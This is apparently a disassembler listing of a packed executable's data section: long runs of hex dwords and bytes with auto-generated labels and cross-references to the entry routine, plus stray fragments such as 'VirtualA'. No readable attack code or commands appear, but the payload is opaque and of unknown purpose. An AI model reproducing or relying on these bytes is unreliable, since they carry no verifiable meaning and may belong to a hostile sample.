dd 43A41905h, 0D8CC36C1h, 0D4ADF8D6h, 5181802Eh, 3C62D0F6h
dd 8D0B0211h, 77770CD0h, 8D020FD8h, 1B503E04h, 3E440E02h
dd 639E0F02h, 46D0498Ch, 5C1180D3h, 8D00AD8h, 83C40B12h
dd 37B704C8h, 5C24AEEh, 0C40A7F32h, 4057C01h, 895D7E0Ch
dd 0A1A06237h, 6E31043Eh, 5AD40506h, 7530E6ECh, 74310607h
dd 30032C18h, 97AD1B0Bh, 6846D709h, 6D4A10D8h, 921418BBh
dd 0EA76E00Ah, 30A10B84h, 0C3C3C588h, 0E4239098h, 9CDB5878h
dd 0C5691967h, 5DB3D35Dh, 3C80FDB0h, 662E9EBFh, 2F4F048Bh
dd 7E10F2A0h, 0D7C35B9h, 0E33A097Fh, 0C33BC475h, 5321C972h
dd 61505BCBh, 2E5335BBh, 470C572Ah, 7EC59C62h, 7CB2BF08h
dd 75EB590Eh, 75CB3BC9h, 2CB0D332h, 5D5D974Ch, 0B34DEFC6h
dd 753DBF74h, 98479124h, 0B1640C10h, 9DCB3043h, 0C26F3394h
dd 0CBBBC3E9h, 0BE4C5306h, 1966900Bh, 4CACC84h, 5FF2C477h
dd 770465C2h, 0C483DA04h, 6A535330h, 0DF074C0Ah, 0FF0CACD6h
dd 20AB5325h, 0CE46497Ah, 27CCB815h, 0D91BD9AFh, 1EA8E4AAh
dd 9037D90Ch, 0A48D91h, 0F3A3A8A8h, 66F1A36Fh, 857C83h
dd 300A0710h, 304B0875h, 310CEC3Ch, 9E0F75BEh, 11C847FFh
dd 885216C8h, 394AE60h, 6EB7FA26h, 5CFD4B46h, 6212ECEBh
dd 57C33DC8h, 0C58B7D68h, 6177E80h, 0CE6D423Ah, 196D866Dh
dd 0F51A1CA5h, 29C11E05h, 936CD263h, 24D00C22h, 0D6FABE8h
dd 2B365EFEh, 9B3003F3h, 56EED1B8h, 6DAFC116h, 0C60E16F0h
dd 140A0DFFh, 0B472B54Ah, 6F202A2Ah, 50B33709h, 903722A8h
dd 11740BF0h, 28D1BF6Eh, 2B990F39h, 0EF8D1C2h, 56B1027Eh
dd 0F923EB63h, 0AB2C0D33h, 0D1CB7615h, 0F9D10F6Fh, 5F70818Dh
dd 66057E27h, 0E9A17FB7h, 0AC16EBACh, 3B0279FEh, 4173B87Dh
dd 2D2BB8F8h, 0EC1342F6h, 1F04AD90h, 2D726750h, 3DBC4B6h
dd 0D19015F7h, 55C7D8E8h, 0F336DB19h, 165543A3h, 6F470B0Eh
dd 1EDF647Dh, 3BF07FFFh, 8D067CF7h, 0BAEB017Eh, 0A4C7814Fh
dd 0FE3BA6E2h, 0FC1E0473h, 0F78BD5B6h, 0FC5F4EACh, 0AC752B00h
dd 90A17622h, 24A30Ch, 0A6040789h, 0A4FB5CD9h, 0F5044789h
dd 0C80807F9h, 528512B4h, 98A7A9CBh, 1A3721C0h, 1047322Bh
dd 0BA10B110h, 0C7448E95h, 0D527A1A5h, 4582AA32h, 186E401Dh
dd 3C609436h, 48689757h, 76192BB5h, 15B8A05Bh, 9E9C980Eh
dd 0E9518E0Ch, 0C73E9193h, 0E05DCE35h, 1E142A2Eh, 46110B74h
dd 5BF86A6Eh, 9A04850Bh, 0B88C8B5Ah, 0CA532084h, 5B1F77B9h
dd 0DC24D771h, 1AE85589h, 4BD3C8Dh, 69AD7E17h, 72B43C9h
dd 0A4028DA0h, 0D49F1B10h, 0F5608501h, 0FEBB0300h, 0E0358605h
dd 0F9B86857h, 85731345h, 0B80ECC30h, 893E4816h, 0EC18DB59h
dd 62853913h, 0A441AFA2h, 0ACEA01A3h, 72696BE0h, 0FF646F7Fh
dd 4E5D0734h, 12C540BBh, 0CD9B82A0h, 97314A95h, 50271068h
dd 39CE84ECh, 0CDE98C4h, 0EE721183h, 7A3D8BA5h, 0A0B912FEh
dd 52C5A8DBh, 0AC017CC0h, 0DBFB7B1Bh, 18397517h, 0B37EBE5h
dd 0D01C8DE0h, 0F65C6C51h, 110319B0h, 0F2001BEh, 0B1DBFD7Bh
dd 1B06282Bh, 151ABD6Fh, 0B5FFCC38h, 99F9A3C4h, 0CCD04DCDh
dd 8C0E1863h, 0B0DDDBBh, 84EB711Eh, 0D31B30CBh, 9D90D868h
dd 75B8B9ECh, 4B4F9969h, 13261098h, 80535306h, 404C244Fh
dd 6A91EB4Eh, 1304B764h, 87EB5F47h, 8C6439Ch, 0DB86C20h
dd 0ABBAE88Ch, 6A4263C7h, 0D72F5D34h, 0C6C70C11h, 6359F460h
dd 0B2C87DAFh, 0B8500460h, 91223F0h, 8C1911ECh, 0EEC86154h
dd 8359C80Bh, 4D8351C7h, 60C07CC8h, 5778EBF1h, 45F1C28h
dd 5AF08EC6h, 0AC0B1B6Bh, 4C330E8Bh, 9899DAB7h, 213976D0h
dd 51A6C8B5h, 24CFB833h, 0A2893E89h, 4420FCBBh, 527DB884h
dd 84AF6425h, 477E97D6h, 0C208C683h, 5ECF72F0h, 0CC0400A7h
dd 5F78D81Dh, 0D574C4C7h, 0AE075328h, 0D1350CBFh, 280F474Ch
dd 666A9F11h, 138B67E8h, 25FF2C11h, 91054808h, 4C8C8E7h
dd 0F410F800h, 919AC16Ch, 0CCECF0h, 0EC27E819h, 0DCE08C8Ch
dd 0F33D5100h, 767D1BF6h, 7208F58Dh, 87E98114h, 162D662Dh
dd 85EC7F6Fh, 0EC731701h, 0C48BC82Bh, 8BE18B0Ch, 0B748C8F1h
dd 0C33140C1h, 8C88804Fh, 8CC8869Fh, 60B8E999h, 0C96F6029h
dd 3A1D77C9h, 88C813h, 0F4F7284Ah, 19930520h, 7E1680E1h
dd 0D03DCC39h, 271B34F7h, 6F5085A8h, 0DF1B4820h, 0D97972Eh
dd 2C32132Bh, 2A7410DCh, 4BCB3580h, 6C1C2F7Ch, 0CB203A27h
dd 142FD6E5h, 30585811h, 0AC765CDAh, 132B805Fh, 0E8112898h
dd 578C2089h, 9F7202A6h, 0E6B5BFE5h, 6D029709h, 70636D65h
dd 65739979h, 97FCB3B9h, 7302BE74h, 656C7274h, 0C302C56Eh
dd 6BCFDD3Bh, 1D616309h, 0D3A631BAh, 3F7FB76Ch, 5940333Fh
dd 2505841h, 0F0F5A40h, 0F837FD32h, 0F490E3Ah, 7865AACAh
dd 74706563h, 6EDD685Fh, 725243D1h, 43023DC1h, 0ADB3696Fh
dd 491BB2FDh, 7878435Fh, 48758546h, 0DEA3781Dh, 4513AF0Ah
dd 6C825F48h, 0BD42676Fh, 0D0310B41h, 7B545243h, 3DB67D9Ch
dd 14E4957h, 38F0C45h
dword_4439A4 dd 0B6418A6Ch ; DATA XREF: start:loc_44A055�o
db 0E0h, 0DEh, 33h
byte_4439AB db 79h ; DATA XREF: sub_44A577+3�o
dd 240BAA0Bh, 76A83743h, 0BDBFB542h, 54600D60h, 7474DEDBh
dd 6FD35265h, 0B7BA8105h, 37FFDB6h, 0E697257h, 73966250h
db 73h
dword_4439D5 dd 9B721B4Dh ; DATA XREF: start+5B�r
db 0FBh, 0D7h, 0EEh
dd 470189C7h
db 0F6h
dword_4439E1 dd 64644113h ; DATA XREF: start+97�w
dword_4439E5 dd 67111772h ; DATA XREF: start+AB�w
db 2Eh, 0D8h, 0A5h
dd 6C75213Ah, 0D8095F4Fh, 356FFDAh, 74726956h, 416C6175h
dd 84452A84h, 751CC10Ah, 4C310261h, 0EA9BB535h, 695433FFh
dd 6F436B63h, 2074E75h, 86B60649h, 2BD5AEEDh, 2E64656Bh
dd 97670363h, 0C04AEB57h, 50754D41h, 930F6555h, 0A1364DEAh
dd 0DAD1452Fh, 5961FDFEh, 6C5F0388h, 0F500DB63h, 461D5302h
dd 0A56DBC80h, 0D6D6710h, 9E47014Fh, 8BDD70E0h, 0B8F6F25h
dd 0D5797021h, 0A66BF6B6h, 0F795323h, 1EBE44EBh
db 0ECh, 0E6h
dword_443A76 dd 16F10C5Ah ; DATA XREF: start:loc_44A4DB�r
dw 273h
dd 4E32335Bh, 26B2BB6h, 497530D7h, 0E6C8718Ch, 6525CB68h
dd 0DF68AD06h, 6F70AA96h, 1870B0A3h, 70616E53h, 46DD6B61h
dd 0D51B6F28h, 1E627F43h, 82DB784Bh, 6D654144h, 0BB4645DBh
dd 4EA57C33h, 32915EAh, 37140B53h, 0EC16D8h, 6E1A2FDAh
dd 0F92FD230h, 0D5AACD86h, 0C85AC3ACh, 4CF2DAD6h, 11A04561h
dd 66F74685h, 76453B9Dh, 0F4A1FAEh, 0C2B46064h, 7F7AAEh
dd 49FB6544h, 671E886Fh, 4C76D6D5h, 1F31E500h, 80007965h
dd 2ED56137h, 5DC88702h, 13868D96h, 6592453Ch, 4466123h
dd 68D80160h, 426C2553h, 0F8D4CF75h, 4902A900h, 2DEB721Ch
dd 0AD6C735Bh, 430A7043h, 53C2694Ch, 7386C9BDh, 765F3D21h
dd 4B08C288h, 9F79D528h, 0F436BBF1h, 0FF501C68h, 45007D18h
dd 0F6532EDBh, 69694508h, 9F685C64h, 428DB76Ah, 146C2767h
dd 0CA267942h
db 6Eh, 0CEh
dword_443B72 dd 284F55D1h ; DATA XREF: start+B1�r
dw 6927h
dd 330787Ah, 9B556309h, 6AB00F45h, 0F8DFE9h, 3C52454Bh
dd 5D0BC74Ch, 2D870A9h, 6682635Dh, 0C2187B71h, 0FC80258Ch
dd 0E9C371D6h, 65061789h, 64D07267h, 3B36ED25h, 0E3007Ch
dd 553F0CAFh, 76B65A53h, 1C5761E1h, 756AF900h, 0B06BB3EEh
dd 149C009Dh, 17D73B7h, 0ADC936C3h, 7075126Fh, 0A7759656h
dd 6901621Eh, 343D01A8h, 16F0528Bh, 0C620D48Eh, 0F8A9654Bh
dd 4336440Dh, 9A3034CCh, 0D6D8CC1Fh, 20EC3BDFh, 56444112h
dd 4B83496Fh, 25617942h, 27556F43h, 67856C11h, 47300F66h
dd 390F5475h, 0D6036B0Dh, 916F1F49h, 5160AE3Ch, 0FFCE0084h
dd 3F50DFD6h, 60335C33h, 3A336C33h, 3380337Ch, 0FF90338Ch
dd 33FF06FFh, 33B933AFh, 1BEB33C4h, 22340934h, 53343134h
dd 79345A34h, 0FF348434h, 0A8FFFFFFh, 0CC34BB34h, 634F634h
dd 31352B35h, 4E353B35h, 7D355D35h, 8E358835h, 9D359335h
dd 0FF35A735h, 0B4FFFFFFh, 0EA35D335h, 1035F535h, 40363536h
dd 5B364836h, 66366136h, 90367736h, 0AB369736h, 0FF36B236h
dd 0C2FFFFFFh, 0E636D136h, 18370436h, 2A372337h, 53373937h
dd 6F376837h, 0F237C237h, 6937F937h, 5638B738h, 0CCFFFFFFh
dd 0EB38DE38h, 2938FF38h, 5C395039h, 94398039h, 0A5399A39h
dd 0A539B839h, 0FFFFFFFFh, 39CB39C5h, 39D839D2h, 39E539E0h
dd 3A0D39F8h, 3A4F3A48h, 3A923A84h, 3AE43AA5h, 0FF3F3AEDh
dd 3BF16FFFh, 0E273C12h, 3F3C383Ch, 0A33C5E3Ch, 0BE3CB13Ch
dd 43CF23Ch, 0FF3DC73Dh, 0E5FFFFFFh, 133DF53Dh, 343E183Eh
dd 793E3A3Eh, 983E7F3Eh, 503EE93Eh, 643F573Fh, 7B3F6B3Fh
dd 3F3F863Fh, 98FFC34Ah, 0D13FCB3Fh, 0F13FEC3Fh, 73200F3Fh
dd 0FFFE302Ah, 31B0FFFFh, 330A31B5h, 332A3320h, 33B03337h
dd 355333B5h, 36153566h, 3633362Ch, 3657364Ah, 0FFFFFFDCh
dd 36ECC3EFh, 37B43758h, 37F437C8h, 383637FAh, 38473840h
dd 38873859h, 38A03899h, 0BFFF38A6h, 38ACFFFBh, 38B838B2h
dd 38C438BEh, 0D1D838D2h, 39283922h, 393D392Eh, 39683951h
dd 40043984h, 3990E358h, 9200F0ACh, 0FF8A1281h, 0FF65F7D0h
dd 0D00F75ABh, 0BE6E3149h, 1ABF031Ah, 37DD0715h, 4D687CDFh
dd 37361AADh, 3F1AB44Dh, 1AB868F6h, 4F522730h, 69E71464h
dd 5076863h, 0B535F700h, 727CE4B9h, 31400140h, 2EB079Fh
dd 97139ABEh, 0D2C31A0h, 0E9D8C80Bh, 403F601h, 7BC51927h
dd 0CA3BA0F2h, 0DB0725FEh, 7C538A31h, 34603A30h, 0CEC2689Fh
dd 0E00492BDh, 304F2338h, 0BC28A703h, 831CC840h, 2A7676A9h
dd 295407A3h, 0A207602Bh, 7628C2Dh, 642B3B92h, 7461525Eh
dd 80FBE761h, 46435307h, 0D8C80731h, 58DD65B2h, 2307AF54h
dd 0B34F072Ch, 0E21D0A8Dh, 0D19F2Eh, 98A323EBh, 780F37Dh
dd 60E13B57h, 2B27F14h, 0ED07C003h, 7F314651h, 0EB0332E2h
dd 0ACB36CEh, 32F61833h
db 13h
dword_443EA1 dd 3AA0BC0h ; DATA XREF: start+4EA�w
db 0A6h, 69h, 9Ah
dd 60DE94A6h, 0B2C8384Ah, 10FA9AEBh, 7A8B267Fh, 34D34433h
dd 3BC6375Dh, 7E9603B2h, 34D3656Ah, 2E3E5E4Dh, 9A31FE16h
dd 0E69A69A6h, 8CA6B8D0h, 9630E374h, 93315C6Dh, 0DF27025Bh
dd 4AA40414h, 83535126h, 722EFFC9h, 0C1F954BFh, 20BB5051h
dd 0EAB75F20h, 0C5FC821Fh, 7D8B2856h, 88B9C5FCh, 778297D4h
dd 0F3C0332Eh, 358B5DABh, 0B73D0328h, 88A06E89h, 0E88845E4h
dd 6C8C1405h, 0E08EE93h, 0D8D41DE4h, 872321C8h, 78DCD4D8h
dd 0E0C87632h, 5DC0EE0h, 0EF92E4ECh, 0AD6E123h, 0B9FFF4FCh
dd 0C0839EC1h, 0AC04133Ch, 33FC4EA6h, 0B78239F6h, 0F875F772h
dd 68144875h, 382205FCh, 0CCD6646Ah, 0C4C83DF7h, 13221B22h
dd 333BEF18h, 1C1634D9h, 0FF147414h, 500F3870h, 1682BAFBh
dd 1009FC8Bh, 0A214EAh, 0E0CCBE7Ch, 0E14BF8D8h, 0CC86192Eh
dd 0F105F7Dh, 1CA8EB7h, 70AC763Fh, 8D282A21h, 3B07F1BEh
dd 0C81274C7h, 8BFFEEF6h, 88B0450h, 890A8950h, 441B0451h
dd 1DE8EB5Eh, 3D8FB7D4h, 588D3F72h, 3D831FC4h, 4192C60h
dd 5B6F4175h, 4E8D0CF1h, 0B02BA3Ch, 0CD404688h, 0A1DB0FD8h
dd 0C91AD24Ch, 1D40568Ah, 23D9EBA0h, 4ABBB640h, 0EE76FFDCh
dd 0B67E10E1h, 8D2E3407h, 354F4786h, 528FB10Ch, 0DC560114h
dd 141AFF03h, 0D10E87A9h, 85F88B2Eh, 55B41FFFh, 8A973F3h
dd 186783h, 11C47C7h, 73750DE1h, 6240600h, 8D0E460Dh, 4F8FB28Eh
dd 4789FBC7h, 9E258A20h, 0F7768688h, 1A67F6B7h, 8904438Bh
dd 38041F1Fh, 8A047B89h, 0DB361896h, 0AC97B367h, 0D0157505h
dd 8E760040h, 47585EECh, 0C4B6FF4Dh, 7607EB0Bh, 1B1C3658h
dd 8550A536h, 0E1803D07h, 9B3C2F34h, 636951CDh, 7194F8Bh
dd 66C60189h, 4889DEC9h, 0C260735Ah, 6E7B645Eh, 0B2ABC7C0h
dd 0B008B6C4h, 0CDDD3399h, 5AD0BD02h, 0B6579D83h, 0F21D8BB8h
dd 2B0AB84Dh, 2AC38011h, 2B5906FBh, 0D31EC01Bh, 0D0DF0BB9h
dd 8E5D8D30h, 247C83CCh, 0E10FD308h, 99012DFEh, 8B470Ch
dd 0A06B08A3h, 0B1B6C058h, 96CCC9C2h, 60170DD7h, 0BFB89A4Bh
dd 0EDB79BBh, 5E8B7FE0h, 0E3B8060h, 4B8B4475h, 0C2538BF8h
dd 0F0176D4Dh, 0C0BF0B7h, 0F981FF33h, 0F445D9E0h, 9BD2C410h
dd 4174F8EDh, 3974E40Dh, 52FB5D8Dh, 4DBB75FBh, 7751509Ah
dd 9643E50h, 4B0DBF51h, 0D2EA97E0h, 89D2322Fh, 4689187Eh
dd 768B301Ch, 8BC4C225h, 0D9F044C7h, 51CD16F0h, 4C6030FFh
dd 0EDCA7454h, 6B9F2D23h, 58F685F0h, 46C60CDBh, 0BF63DB64h
dd 6846DDFBh, 44B3B89h, 153C850Fh, 0F0DF983h, 0F41E3382h
dd 1A37DB37h, 0CC255D8h, 2210CA3Bh, 16F87D81h, 9F7FC1EAh
dd 46C70975h, 6673C618h, 0D85C23F6h, 8D1A8BE3h, 1C4E719Fh
dd 50C488Dh, 0F6DBE106h, 0D7408B20h, 892455CBh, 874AEC5Dh
dd 46BFB16Fh, 878D928Fh, 6F42BE4h, 0C6783189h, 7089C2C8h
dd 13CB9756h, 42005D8Bh, 430F585Bh, 0BAC6481Dh, 0CD20CD2Ch
dd 7746B746h, 0D52B6857h, 0F7B910F9h, 6185C1DBh, 3135170Bh
dd 0AC0C1DF4h, 8A0D0B2Ah, 3BE4B574h, 0B5A1286Eh, 4189DB80h
dd 49F0459Ch, 61704444h, 0E689E086h, 76704EA6h, 6F1B272h
dd 569BEC97h, 88609F2Ch, 0CB73C5F5h, 0EE437389h, 0C68762CDh
dd 26572278h, 8BE0861h, 0C5DF169Fh, 0BDDB6205h, 1CBB1424h
dd 0DE778BC8h, 9399CC3Eh, 0CF17DCDh, 10020C39h, 0B3E1D3B8h
dd 5751CEBh, 0A3030BE8h, 0E04AEB30h, 0D866CF6Ch, 0D12DD56h
dd 56CCC941h, 0AF492043h, 25163C6Bh, 5D410052h, 490D5203h
dd 732F9Ah, 57005F1Bh, 24C15B4Eh, 0D1102405h, 1BA2DC08h
dd 8D7A5070h, 538A305Eh, 0BBA14566h, 0AFC45h, 0F33BFA05h
dd 0B90BB5D9h, 121C0972h, 0EF20CF0h, 64F3E6CDh, 18E87EF4h
dd 8EEC1AEAh, 8B5EC6FFh, 0C084D7F8h, 45AB2175h, 0F82140Ch
dd 7E85927h, 23350332h, 363B236Ch, 418A564Ch, 3F6EA48h
dd 11BB5B91h, 3F0B02C2h, 0E4880C06h, 10E7C8F3h, 0D8140E1Ah
dd 1C0BC018h, 0F9F9F9E4h, 103E2079h, 28137C24h, 9A2C0CC8h
dd 85AE1C0Dh, 2847663h, 85CC3A5Dh, 0DDFD0A66h, 0D62C144Ah
dd 641BADEEh, 20038B1Eh, 0E68A17Ch, 0FE420789h, 4D8F9F4h
dd 89047808h, 0C606EB3Dh, 1B03E42h, 9142A75Bh, 0C77F2Eh
dd 5D8E832Fh, 18069C6Bh, 2259344Bh, 6BDED942h, 31C2C0Bh
dd 389F1863h, 0EB3A9BB4h, 0B58FDE02h, 0F709BE56h, 0DF58878Ch
dd 5CA24CCEh, 9BDBB60Ch, 4EB89331h, 7D834B58h, 0FF21610Ch
dd 83D2C190h, 9D753E78h, 1EEBCE2Eh, 7E1840C7h, 3A7B115h
dd 35201556h, 78E0D22Fh, 40592A5Eh, 78100218h, 527EF7CCh
dd 8A1850ABh, 0A06D6015h, 22F62EB2h, 5672854Ah, 0C68C5873h
dd 0A274EB53h, 0ECEB36B2h, 0DD1CC631h, 5E75DE56h, 0C86C0628h
dd 0CAA37DEh, 72582834h, 0E223C36Bh, 4E57F85Dh, 0B51183E0h
dd 728F68C0h, 2E79D2FCh, 0B7E9FBC5h, 7B548FE4h, 0B86005EBh
dd 64568D72h, 7F740C55h, 7F89BFDBh, 80F0EB36h, 3700647Eh
dd 8B53684Eh, 418B6051h, 52305A6Ah, 810CE91Bh, 708AFFBh
dd 0C0A90DAEh, 0D8CFA285h, 0B22C0375h, 66A5F4ADh, 18B81058h
dd 0B08428Bh, 3495C807h, 0A95B7348h, 0EC1830FCh, 1029EB1Eh
dd 7DCDD08Ah, 0AB5C0461h, 0BBD402E0h, 9774CFEh, 2CF8190Fh
dd 0E3533F5Fh, 480F2C41h, 0DB85D8FCh, 0DFFFFCAEh, 2955F1D5h
dd 8FA8110h, 75400100h, 0E718D47h, 0A5247B8Dh, 288BA566h
dd 15AD5B10h, 765C3007h, 0DE90542Bh, 638369F3h, 0DB3019C4h
dd 0CEB1DAEh, 0F612201Ah, 0DD6EDC1h, 66040966h, 20A11407h
dd 95DD0B29h, 36EBED9Eh, 0D618094Eh, 0AB66AB4Dh, 0F3352BDBh
dd 0F63E2A07h, 0D80B1F42h, 143056CEh, 93ED0C27h, 947CDB1Ah
dd 51140A11h, 0DC38BC52h, 0E0DBC3DDh, 10AF930Ch, 14708D3Dh
dd 8070296h, 67D9D333h, 87DE8D59h, 8B212A1Ch, 0B2055590h
dd 57B216Fh, 5850D771h, 0DB2022EBh, 0F06D03Fh, 528B921Bh
dd 0F1218330h, 7E164C50h, 37694CB8h, 4513C50h, 2325833Ch
dd 9980F852h, 23183A00h, 0ECACAF4Fh, 0F18BD33Ch, 9F1DCF0Bh
dd 3BB90510h, 0F09688F9h, 3B60A5FCh, 80C73294h, 0C4788D52h
dd 5F0E7D3Bh, 407CA2h, 478B4097h, 0E869FC3Ch, 8708499h
dd 0A8576CD3h, 0E7035A1Dh, 8FE31CFEh, 0D77241D8h, 0D72A528Ah
dd 8C3118EBh, 0F246170h, 770C3D20h, 2F09DF24h, 3FF4BE0Ch
dd 0E33748A7h, 4AF4BEEFh, 0F77D89CFh, 5B3ADCB8h, 0F8B6B6FBh
dd 0E7B40118h, 0E141F6FCh, 0FBBB9AD7h, 0F3A6B674h, 1BEDB376h
dd 9A3A1948h, 0E2447F83h, 3661D051h, 0D3C11663h, 0B2311644h
dd 0E552D195h, 28F60D8Bh, 0D3E3A2BAh, 76A71E56h, 2254AA60h
dd 61A374E0h, 0A9F97FFFh, 8B3A6253h, 118BC14Dh, 674D285h
dd 108BC28Bh, 0E083F6EBh, 7BAE16C6h, 0A853B4F4h, 2F8EEB0Ah
dd 4B2D58EEh, 20830CA6h, 7682801Ah, 0CF132974h, 845114A0h
dd 0C39005EAh, 4D425638h, 0EF143F96h, 0BF76BEFh, 0D08699FFh
dd 460A06BAh, 637C5060h, 8CBB07BCh, 0BAA83986h, 34F4B3D3h
dd 670C10E3h, 3CA22464h, 2321A792h, 313F077h, 0DC5BF86Ch
dd 0D6A5C7Bh, 755A03FFh, 4BA58B19h, 0A17C112Ch, 7744A750h
dd 0E519722Dh, 67B6FB5Bh, 2A4B0306h, 18591CEBh, 488B0A73h
dd 0F82376CFh, 731477CEh, 13EB4F05h, 2D08401Dh, 66B41AD0h
dd 0A9EB232Ch, 0D5EADC1Bh, 148B2C0Bh, 0F67B3602h, 0BA6739C1h
dd 108FC16Bh
dd 13DC1084h, 36DCD85Fh, 18A508B3h, 27F7620h, 2DF8207Dh
dd 14045F2Dh, 34F46583h, 76FFFE62h, 40DBBF0Dh, 184D6889h
dd 0C33DD950h, 731C7D39h, 1BE86097h, 452BC7EBh, 4BA2B11Ch
dd 21FD3AB0h, 73FF4043h, 67DF7C38h, 46EC9EC5h, 40538A24h
dd 80F89927h, 800A0D7Fh, 2BBA528Bh, 0B2C9F475h, 4C4F7815h
dd 0EC343BC2h, 36360580h, 66342640h, 7565D81Dh, 5EB35E24h
dd 41BA68EBh, 6846A16Bh, 0C137C985h, 51D855C0h, 79834FEEh
dd 0E1A949F1h, 25746152h, 89540849h, 0CB6359B2h, 14E2E7C5h
dd 0DA850B78h, 8014F80Fh, 781A1C60h, 2155364Ch, 2E0A5F6h
dd 0E182A5F3h, 1DA4F303h, 0F600D270h, 7C8D0442h, 73D1A10h
dd 34FC07DBh, 608318B3h, 8CE4D48h, 631B6944h, 83882517h
dd 8B1055CFh, 1FBBB925h, 73838DF0h, 89113C4Ah, 0D4054042h
dd 691B133Eh, 0C1A00B3Ch, 30872D08h, 2E93AFB6h, 77F424CEh
dd 9A23AEF4h, 83C1C099h, 4C08448Dh, 4306085Eh, 7526291Fh
dd 20D83670h, 0EFE8F2D9h, 3874ECE8h, 48E96C3Eh, 0A27E5148h
dd 6EE6DF1Ch, 535C73F4h, 44342E54h, 88DB482Ch, 8E44A955h
dd 2770BF20h, 0F73B156Dh, 710CD0B3h, 743A3C39h, 0CC375BA4h
dd 4160DFA6h, 0C34049D3h
dword_444804 dd 0D83A46B2h ; DATA XREF: start+61�r start+68�w ...
dword_444808 dd 2358BC4h ; DATA XREF: start+81�w
dword_44480C dd 0C8AAD6h ; DATA XREF: start+74�r
dd 0D79EC342h, 8CD308BAh
db 6
dword_444819 dd 6B29D634h ; DATA XREF: start+89�r
db 37h, 4Ah, 3Fh
dd 0F09C2C64h
db 30h, 0EBh
dword_444826 dd 1C16B805h ; DATA XREF: start+9D�r
dw 2320h
dd 1CE12CD0h, 716C8409h, 15348308h, 23889404h, 269C0CCFh
dd 2CF6CA57h, 57090234h, 533F0C31h, 0E95AC1C1h, 14EB1B75h
dd 0C0EC35DBh, 0BEACD98Bh, 0DA2B2075h, 1393A572h, 0A4D88357h
dd 0DA12F8FBh, 522C1054h, 61022B74h, 0CDB4D9F1h, 3C75B02Dh
dd 0B6596CB2h, 2303C6Dh, 0ED24282Ch, 8587B06Eh, 0E62C1074h
dd 0DC622D2Ch, 511A05AAh, 823AD083h, 0FD099D6Fh, 0FAC28BFh
dd 28024FB7h, 0FA469AF5h, 0E3DD728h, 0C64B6361h, 21BBF65Bh
dd 0A028399Dh, 15B7095Ah, 8134080Eh, 0D6E66311h, 21F1DE5h
dd 0B5CA830Ah, 0B58B9EEBh, 5960168Ah, 88E62015h, 11CCC43h
dd 6D803BE0h, 7189C06Fh, 459890Bh, 1378C918h, 0CA4F61D8h
dd 1B22C857h, 8B154870h, 5C137207h, 9436D8C4h, 2F03B04Bh
dd 1BDB6CB2h, 1842A72Dh, 5A20056Ah
dword_444914 dd 0EDADC47Eh ; DATA XREF: start+91�r start+A5�r
dword_444918 dd 8B34883Bh ; DATA XREF: start+7B�r
dd 0C23B8104h, 23B35C7Eh, 0EE578DF4h, 0B740368h, 81E9BE53h
dd 3C1BE756h, 1539E440h, 3E88FFDh, 8B250F85h, 6A8E2237h
dd 6177A13Dh, 59A258h, 0B38B01A0h, 0DDECA8D4h, 58BEF8Dh
dd 0FEBDC89h, 6A604324h, 7ED0211Ch, 0BEDAB01Bh, 0BF313990h
dd 6A3766CEh, 16758A15h, 3BB9EC63h, 231DF033h, 7136EC6Eh
dd 354D738Bh, 77096418h, 0DE7B574Dh, 58B65968h, 544C3005h
dd 1B1830B4h, 0D6CB2E46h, 5C480C18h, 1950AE54h, 345979ECh
dd 541A125Ch, 0AFFE1DB7h, 90E80DBBh, 4059D8Ch, 0C7445389h
dd 0A31C4800h, 291A7D2Bh, 0BEC63B01h, 44DB0293h, 0C77018EAh
dd 53067B43h, 10B7631Eh, 0A48EBA22h, 96F5C03Eh, 4CC6063Bh
dd 840C3421h, 0B9A0E512h, 5D146130h, 0BB354884h, 3526D721h
dd 29E80E2Ah, 0F758C907h, 78A6B259h, 916B570Ah, 0B58A8468h
dd 0F7B1875h, 29DE006Eh, 1A6FD40Ah, 7A8D1B6Ah, 9F075910h
dd 1858E02Ch, 0BFF3E14Dh, 2E1D7C06h, 105109C9h, 0A050984Eh
dd 991A3700h, 323243B7h, 46326B86h, 4DCE0CFCh, 398CA64Dh
dd 665BA360h, 0B6320AB4h, 0AD70D6Dh, 4A31AA64h, 77597A08h
dd 0D1DED8FBh, 0E0CA664Ah, 324B14AAh, 42C08571h, 0C681181h
dd 5FA8939Ch, 605C47ABh, 14B98F0Ch, 0D3CB428Eh, 530084F2h
dd 843B1931h, 5CBB800Eh, 0EC278A60h, 90A46ECCh, 8D8066E2h
dd 670A4E5Ch, 0C46E4145h, 0FA008897h, 25300C88h, 38EC8191h
dd 2BC41D10h, 125725CCh, 0CD6807BFh, 3304B9AEh, 0E6C3BAFFh
dd 0D89680D9h, 0FC04DCDAh, 3B3E6C9Eh, 0CA0CC812h, 0D010CC0Eh
dd 0D9910B18h, 0D41AD27Ch, 9466F820h, 36DD028h, 2CE213E0h
dd 0D5D40FD2h, 0A2531740h, 0A0083056h, 0C228656Dh, 995D8D57h
dd 0A7365B61h, 0C80A1ED6h, 0B7580C81h, 0D011CB21h, 500C83Bh
dd 0F6C8B7Dh, 11D83B18h, 788C3DB6h, 3FEE2284h, 0ECBA1F6Fh
dd 2004B809h, 7F0C8DF8h, 0B419E7C1h, 48EEC42Dh, 44D521C4h
dd 77F4DC07h, 56EFACE8h, 53BF773Ah, 8D458189h, 0D106DC60h
dd 0F6E0B541h, 96DE8C00h, 4D5B17A0h, 7D318BE0h, 4581C128h
dd 0AFAC99A0h, 0F4BBB9A2h, 0BAB60DFFh, 8DC2FF50h, 32B87373h
dd 6A9A2E89h, 7A8DDF00h, 0B6E5B5F8h, 0DF86675h, 3040883h
dd 96FB02ECh, 6F4D68Eh, 114279Dh, 0F0B41BE9h, 0B2176E6Dh
dd 5E377B85h, 460014F0h, 0FF1E19B9h, 0FEEE150Ch, 0A093A00Ch
dd 3889CABBh, 0C651E35Fh, 7BD41C31h, 6C6AE279h, 73718B8Ch
dd 0FE00F4Dh, 2CD3591Bh, 63A239A3h, 0FBC321C3h, 130C1A1Eh
dd 282B5AD1h, 8C140D71h, 26734182h, 0BA438364h, 0E017750Eh
dd 8308A80Eh, 9C383597h, 904C0D5Bh, 9BD2F893h, 8128481Ah
dd 0C401147Bh, 0B80775FCh, 0A6D834ACh, 4637EB2Ah, 0A445B957h
dd 93C5278h, 5304C053h, 735A01BDh, 682F8740h, 68F14CD9h
dd 9BBDFDC4h, 3B1D6A5Fh, 0BE4C8BBFh, 8193A354h, 7F061479h
dd 1AE00A1h, 81208D6Dh, 7605DC38h, 6854D005h, 6001B1Bh
dd 3C725E2Ch, 2FA39DDDh, 29665D14h, 19112830h, 9C9B584Ah
